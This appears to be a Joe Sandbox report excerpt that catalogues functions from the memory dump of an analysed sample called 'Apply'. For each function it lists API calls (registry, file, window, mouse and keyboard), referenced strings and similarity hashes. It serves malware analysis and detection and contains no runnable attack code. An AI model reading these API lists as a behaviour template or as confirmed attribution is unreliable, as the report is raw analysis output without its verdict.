APIs

__allrem.LIBCMT ref: 0088037A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00880396
__allrem.LIBCMT ref: 008803AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008803CB
__allrem.LIBCMT ref: 008803E2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00880400

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8cf0651829415527d5c628b1b57484c99734d042a52203334b1857180c4d1198
Instruction ID: bc0cd842229fe48db54fbde9e1c8073c50bef9de8ce7bc98587098c1796b8f85
Opcode Fuzzy Hash: 8cf0651829415527d5c628b1b57484c99734d042a52203334b1857180c4d1198
Instruction Fuzzy Hash: 0981F772A00706ABE765BE6CCC85B6AB3E8FF40724F24412EF511D7691E7B0E9088F55

Function 0088654E Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00878629,00878629,?,?,?,0088679F,00000001,00000001,8BE85006), ref: 008865A8
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0088679F,00000001,00000001,8BE85006,?,?,?), ref: 0088662E
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00886728
__freea.LIBCMT ref: 00886735

Part of subcall function 00883B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A59,?,0000015D,?,?,?,?,00878590,000000FF,00000000,?,?), ref: 00883BA2

__freea.LIBCMT ref: 0088673E
__freea.LIBCMT ref: 00886763

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7396743fbd467d2503c1db6afd8f05d508ea15c631e7a803a5a884ae2abe804f
Instruction ID: 5def35df86d3f7e32152a0c9471f96d0090573648ed4d7be24188af16c6972ed
Opcode Fuzzy Hash: 7396743fbd467d2503c1db6afd8f05d508ea15c631e7a803a5a884ae2abe804f
Instruction Fuzzy Hash: 1751CFB2600217ABDB25BF64CD85EAB77AAFF54B54B548728F904D6140FB34DC608790

Function 008DC362 Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008DD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DBE35,?,?), ref: 008DD13C
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD178
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD1E6
Part of subcall function 008DD11F: _wcslen.LIBCMT ref: 008DD21C

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC451
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC4AC
RegCloseKey.ADVAPI32(00000000), ref: 008DC4F1
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008DC520
RegCloseKey.ADVAPI32(?,?,00000000), ref: 008DC57A
RegCloseKey.ADVAPI32(?), ref: 008DC586

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 1b72cee311eee18ec184460ed389ccb2fc56dcac6040a22622bf48acc410fe0e
Instruction ID: be5283e4e8117be65deffdb8d4cccbbf0d53a204d57cb70f43d7a8b327239205
Opcode Fuzzy Hash: 1b72cee311eee18ec184460ed389ccb2fc56dcac6040a22622bf48acc410fe0e
Instruction Fuzzy Hash: A4815F31108241AFD714DF24C895E2ABBF5FF84308F548A5DF4598B292DB31ED4ACB92

Function 008C987B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

GetOpenFileNameW.COMDLG32(00000058), ref: 008C9C54
_wcslen.LIBCMT ref: 008C9C75
_wcslen.LIBCMT ref: 008C9C9C
GetSaveFileNameW.COMDLG32(00000058), ref: 008C9CF4

Strings

X, xrefs: 008C9B81

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 6bd74f00f4688564a46b2d9d52bc9f6f3d4fd3805480f2f1e2b3cc16fb26268f
Instruction ID: bf560ac4c18f7ab16053e5eb520b8dca80b7e34a46bfc96fd8dc2577502d73a7
Opcode Fuzzy Hash: 6bd74f00f4688564a46b2d9d52bc9f6f3d4fd3805480f2f1e2b3cc16fb26268f
Instruction Fuzzy Hash: 82E15B715083508FC724DF28C895B6AB7E5FF85314F1489ADE889DB2A2DB30DD09CB92

Function 008C6BFD Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008C6C4B
CoInitialize.OLE32(00000000), ref: 008C6DA8
CoCreateInstance.OLE32(008F0CE0,00000000,00000001,008F0B50,?), ref: 008C6DBF
CoUninitialize.OLE32 ref: 008C7043

Strings

.lnk, xrefs: 008C6C29, 008C6C93, 008C6D4F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 64830620e41e2706302482f09bf7974ca1b78061f73afaeb562f65bde208bb14
Instruction ID: dc692b13d0cecdbebc1544ccd9b8aa7fdafa0ae151c816a5ab0916bf5c97754d
Opcode Fuzzy Hash: 64830620e41e2706302482f09bf7974ca1b78061f73afaeb562f65bde208bb14
Instruction Fuzzy Hash: 98D105716083019FD314EF28C881E6AB7E8FF84715F40496DF995CB262EB71E949CB92

Function 00869442 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2

BeginPaint.USER32(?,?,?), ref: 00869477
GetWindowRect.USER32(?,?), ref: 008694DB
ScreenToClient.USER32(?,?), ref: 008694F8
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00869509
EndPaint.USER32(?,?,?,?,?), ref: 00869557
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008A77FA

Part of subcall function 0086956F: BeginPath.GDI32(00000000), ref: 0086958D

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: fc5cc691c679a359a3d7e6eefabb5aab13d2673fb063aee23380efd5d4c5e0b9
Instruction ID: a165d0951775d7c9a5ef6876929e569b7bfd1423a2835cf67dd95ff0e716aec9
Opcode Fuzzy Hash: fc5cc691c679a359a3d7e6eefabb5aab13d2673fb063aee23380efd5d4c5e0b9
Instruction Fuzzy Hash: B641A230109305AFD721DF24CC88F767BA8FB56724F140169F999CB2E2D7309845EB62

Function 008C0EC0 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 008C0EDD
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 008C0F18
EnterCriticalSection.KERNEL32(?), ref: 008C0F34
LeaveCriticalSection.KERNEL32(?), ref: 008C0FAD
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008C0FC4
InterlockedExchange.KERNEL32(?,000001F6), ref: 008C0FF2

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 73b5b48e2de1c79a4e010c400f737eb99d66f519ae5d9e9ebea5be901be1fc89
Instruction ID: e51e91b2513dee0a9dad710ed01df817339d1cea303596cc84a87c6f6d69dee5
Opcode Fuzzy Hash: 73b5b48e2de1c79a4e010c400f737eb99d66f519ae5d9e9ebea5be901be1fc89
Instruction Fuzzy Hash: BF414A71900205EBDF14EF58DC85AAAB778FF04310F1480A9E904DE29ADB70EE95DFA1

Function 008E88C7 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,008AF95A,00000000,?,?,00000000,?,00892A40,00000004,00000000,00000000), ref: 008E8938
EnableWindow.USER32(?,00000000), ref: 008E895E
ShowWindow.USER32(FFFFFFFF,00000000), ref: 008E89BD
ShowWindow.USER32(?,00000004), ref: 008E89D1
EnableWindow.USER32(?,00000001), ref: 008E89F7
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008E8A1B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: e9def10bdb6c5e3e0aa8692e34590587312437987c9b342eb905dbc34a5a599d
Instruction ID: 354437f7baea31ed3f77c144018298fb461d169cbf4f1fcab7adcad772efba8a
Opcode Fuzzy Hash: e9def10bdb6c5e3e0aa8692e34590587312437987c9b342eb905dbc34a5a599d
Instruction Fuzzy Hash: 8A418134A05284EFDB26DF15C989BB87FA0FB07314F1841A9E55C9B273CB316846DB42

Function 008D2A61 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 008D2A6F

Part of subcall function 008CEC5D: GetWindowRect.USER32(?,?), ref: 008CEC75

GetDesktopWindow.USER32 ref: 008D2A99
GetWindowRect.USER32(00000000), ref: 008D2AA0
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 008D2ADC
GetCursorPos.USER32(?), ref: 008D2B08
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008D2B66

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: e2c88f83f0fe3da17661f70fbfe0bbc36c15113a380da3bb6c71c1e6ea311e1f
Instruction ID: c96e1ac781c9aec3960969bf2e59e2c08348add0c0ee49346b162902b1842b6a
Opcode Fuzzy Hash: e2c88f83f0fe3da17661f70fbfe0bbc36c15113a380da3bb6c71c1e6ea311e1f
Instruction Fuzzy Hash: 0E31C372505366AFC720DF18C849F9BB7A9FF94314F000A1AF899D7291DB74E908CB92

Function 008B5376 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 008B538E
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008B53AB
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008B53E3
_wcslen.LIBCMT ref: 008B5401
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008B5409
_wcsstr.LIBVCRUNTIME ref: 008B5413

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 43b9d47d182fe293aa4178c27ff6d64936df226e8877539ea2555067a4f56d6f
Instruction ID: 8cc624be42049c5001272bc33c86cd6b40abf8ee8d373c3f991217ab17fb78c2
Opcode Fuzzy Hash: 43b9d47d182fe293aa4178c27ff6d64936df226e8877539ea2555067a4f56d6f
Instruction Fuzzy Hash: 1F210472604644BBEB165B699C49FBF7BD8FF49750F108039F809CA2A1EAB1CC4186A0

Function 008E838D Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 008E83D1
SetWindowLongW.USER32(00000000,000000F0,?), ref: 008E83F6
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008E840E
GetSystemMetrics.USER32(00000004), ref: 008E8437
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008CBF1C,00000000), ref: 008E8457

Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2

GetSystemMetrics.USER32(00000004), ref: 008E8442

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 1f98975ee249a7b73f5ee5d2827f7438aa2bdafc32a14b7f84f9505e85f1aaba
Instruction ID: 08ff566491bac4e94e468f7c207544b97287e9714ccbf5e3184c8170509bf866
Opcode Fuzzy Hash: 1f98975ee249a7b73f5ee5d2827f7438aa2bdafc32a14b7f84f9505e85f1aaba
Instruction Fuzzy Hash: F221A171610396EFCB249F79CC48A6E37A5FB46329F258629F92AC61E0DE308854DB14

Function 008736D2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008736C9,00873335), ref: 008736E0
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008736EE
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00873707
SetLastError.KERNEL32(00000000,?,008736C9,00873335), ref: 00873759

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e86f4959143cf545ca0006deabd6ab263ade84596de958a8ad79c64bc3b89d8d
Instruction ID: 177b8928b33a7475bb876329a6e994fa503c20ec6b3e456fb2889d3bacd5a2f3
Opcode Fuzzy Hash: e86f4959143cf545ca0006deabd6ab263ade84596de958a8ad79c64bc3b89d8d
Instruction Fuzzy Hash: FB01F9B731E7216EA61866786CC55561A95F7163B5720C239F128C51E4FF11CD02B143

Function 008830C4 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00874D33,00000000,?,?,008768C2,?,?,00000000), ref: 008830C8
_free.LIBCMT ref: 008830FB
_free.LIBCMT ref: 00883123
SetLastError.KERNEL32(00000000,?,00000000), ref: 00883130
SetLastError.KERNEL32(00000000,?,00000000), ref: 0088313C
_abort.LIBCMT ref: 00883142

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: b3021f652fab0ec1c400be1def1ffc00d58280812c6678c83135673fcd497f2e
Instruction ID: 69cd6bec812854405b9f068de21ff7cd979e0d41c02b21cac268cce141c38564
Opcode Fuzzy Hash: b3021f652fab0ec1c400be1def1ffc00d58280812c6678c83135673fcd497f2e
Instruction Fuzzy Hash: 75F0223A609A1167C232B73CAC0EA9B3629FFD0F74F204114F829D6291FF258A019363

Function 008E9110 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0086986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008698C9
Part of subcall function 0086986F: SelectObject.GDI32(?,00000000), ref: 008698D8
Part of subcall function 0086986F: BeginPath.GDI32(?), ref: 008698EF
Part of subcall function 0086986F: SelectObject.GDI32(?,00000000), ref: 00869918

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 008E913A
LineTo.GDI32(?,00000003,00000000), ref: 008E914E
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 008E915C
LineTo.GDI32(?,00000000,00000003), ref: 008E916C
EndPath.GDI32(?), ref: 008E917C
StrokePath.GDI32(?), ref: 008E918C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: d61868818b8fc7447b6a0a7449a39df919f9ceafa3fe8626077c68cc0cf91808
Instruction ID: 164016364875b340234ea23a6d52d5927bd29216c63805b24aea11141b00efd9
Opcode Fuzzy Hash: d61868818b8fc7447b6a0a7449a39df919f9ceafa3fe8626077c68cc0cf91808
Instruction Fuzzy Hash: D1111B7600024DBFDF129F90DC88E9A7F6DFB08350F048021FE198A1A1C772AD56EBA0

Function 008B58F6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008B5911
GetDeviceCaps.GDI32(00000000,00000058), ref: 008B5922
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008B5929
ReleaseDC.USER32(00000000,00000000), ref: 008B5931
MulDiv.KERNEL32(000009EC,?,00000000), ref: 008B5948
MulDiv.KERNEL32(000009EC,00000001,?), ref: 008B595A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ef7c638155f37430fd9ddced53c4eefb3a0e67e849402913cb2295747ded993e
Instruction ID: a2a26e249e44e3dd438fa464cb0e30eecce83cd143498baab644fa829f97e13e
Opcode Fuzzy Hash: ef7c638155f37430fd9ddced53c4eefb3a0e67e849402913cb2295747ded993e
Instruction Fuzzy Hash: FC018475A00708BBEB109FE59C89F5EBF78FB54351F044065FA08EB291D6709804CF90

Function 00852A8D Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00852ABE
MapVirtualKeyW.USER32(00000010,00000000), ref: 00852AC6
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00852AD1
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00852ADC
MapVirtualKeyW.USER32(00000011,00000000), ref: 00852AE4
MapVirtualKeyW.USER32(00000012,00000000), ref: 00852AEC

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: fec2f86613c3a5bb46cedf21f2af46d068919558a00c0697a44ed22d0d2034d9
Instruction ID: 31237d2f38fd7e07dd31ae929717988305935dc6189412a594fc8a03982a7593
Opcode Fuzzy Hash: fec2f86613c3a5bb46cedf21f2af46d068919558a00c0697a44ed22d0d2034d9
Instruction Fuzzy Hash: AB016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C4B941C7F5A864CBE5

Function 008BF161 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008BF171
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008BF187
GetWindowThreadProcessId.USER32(?,?), ref: 008BF196
